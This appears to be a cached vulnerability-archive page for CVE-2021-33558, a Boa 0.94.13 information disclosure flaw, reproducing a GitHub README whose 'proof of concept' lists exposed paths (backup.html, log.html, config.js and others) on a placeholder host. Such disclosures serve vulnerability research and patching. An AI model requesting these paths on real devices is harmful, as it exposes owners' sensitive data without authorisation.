Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-33558 PoC — Boa 信息泄露漏洞

Source
https://github.com/mdanzaruddin/CVE-2021-33558.
Associated Vulnerability
Title:Boa 信息泄露漏洞 (CVE-2021-33558)
Description:Boa是Boa开源的一种适用于嵌入式应用程序的开放源代码。 Boa 0.94.13 版本存在信息泄露漏洞,该漏洞允许远程攻击者通过错误配置获取敏感信息。
Readme
# CVE : CVE-2021-33558.
 Exploit code of CVE-2021-33558
 
# Summary

In Boa/0.94.13 there is various misconfiguration.it expose various senstive information.


# Proof of Concept

>> https://target.com/backup.html

>> https://target.com/preview.html

>> https://target.com/js/log.js

>> https://target.com/log.html

>> https://target.com/email.html

>> https://target.com/online-users.html

>> https://target.com/config.js
File Snapshot

 [4.0K]  /data/pocs/9ae44d24d7621742d01ec1538637db706ab10ca5
├── [1.0K]  LICENSE
└── [ 423]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.